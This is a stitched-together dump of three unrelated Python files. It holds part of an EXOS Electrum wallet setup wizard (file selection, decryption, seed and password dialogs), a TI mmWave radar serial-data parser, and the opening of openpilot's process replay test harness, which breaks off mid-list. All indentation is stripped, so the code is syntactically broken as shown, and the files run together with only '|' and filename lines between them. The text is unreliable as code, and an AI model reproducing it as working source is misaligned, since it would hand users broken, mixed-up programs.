vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('EXOS Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None) #
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('With it, you can recover your tokens if you loose your wallet.'),
_('Without it, your tokens will be lost forever.'),
_('To make sure that you have properly saved your seed, please enter it here to validate.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("EXOS-Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let EXOS-Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
x8_mmw.py
|
#
# Copyright (c) 2020, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR6843 ES2.0 @ mmWave SDK demo of SDK 3.4.0.3
# TI IWR1843 ES1.0 @ mmWave SDK demo of SDK 3.4.0.3
#
import sys
import json
import serial
import threading
import struct
from lib.shell import *
from lib.helper import *
from lib.utility import *
from lib.logger import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR18xx', 'xWR68xx', 'xWR64xx'),
'ver': ('03.04.00.03', '03.05.00.04',),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'logMagRange': ('plot_range_profile', ), # 'capture_range_profile',),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': ('plot_detected_objects', ), # 'simple_cfar_clustering',),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
log = Logger(verbose)
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'loglin': float('nan'), 'fftcomp': float('nan'), 'rangebias': float('nan')}
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_apps_' in c:
_meta_['app'] = c['_apps_']
c.pop('_apps_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1;
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
dataFramePrev = {}
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # just print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
if len(output) == 0: # filter out empty and duplicate frames from log
if dataFramePrev.setdefault('header', {}).setdefault('objects', 0) > 0:
log.message(dataFramePrev)
dataFramePrev = output
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
def aux_buffer(input, output, head=40, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8] # magic
v = intify(dat[ 8:12], 10) # version
l = intify(dat[12:16]) # length
d = intify(dat[16:20], 10) # platform
f = intify(dat[20:24]) # frame number
t = intify(dat[24:28]) # cpu cycles
o = intify(dat[28:32]) # num objects
s = intify(dat[32:36]) # segements
u = intify(dat[36: n]) # subframe
return n, v, l, d, f, t, o, s, u
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_object(dat, oth, n=16): # detected points/objects
#x = struct.unpack('f',dat[ 0: 4])[0]
#y = struct.unpack('f',dat[ 4: 8])[0]
#z = struct.unpack('f',dat[ 8:12])[0]
#p = struct.unpack('f',dat[12: n])[0]
x = intify(dat[ 0: 4])
y = intify(dat[ 4: 8])
z = intify(dat[ 8:12])
p = intify(dat[12: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 7) point cloud side info
while address == 7 and len(buffer) >= 4 and values > 0:
buffer = buffer[4:] # TODO
values -= 1
if values == 0: address = 0
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1) point cloud
while address == 1 and len(buffer) >= 16 * output['header']['objects'] and values > 0:
numPoints = output['header']['objects']
for i in range(numPoints):
n, p, x, y, z = aux_object(buffer, other)
progress(n, indices[address], ('{},{}'.format(i, i), {'v': p, 'x': x, 'y': y, 'z': z}))
# ----------
# 0b) segment
if len(buffer) >= 8 and blocks > 0 and address == 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
blocks -= 1
if address in (1, 7):
output[indices[address]] = {}
elif address in (2, 3, 4, 5):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if len(buffer) >= head and blocks == -1 and address == 0 and values == 0:
n, v, l, d, f, t, o, s, u = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s, 'subframe': u}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
process_replay.py
|
#!/usr/bin/env python3
import capnp
import os
import sys
import threading
import importlib
import time
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
from selfdrive.manager import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "dMonitoringState": [], "plan": [], "pathPlan": [], "gpsLocation": [], "liveLocationKalman": [],
"model": [], "frontFrame": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "plan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["dMonitoringState"],
"liveCalibration": [], "carState": [], "model": [], "gpsLocation": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
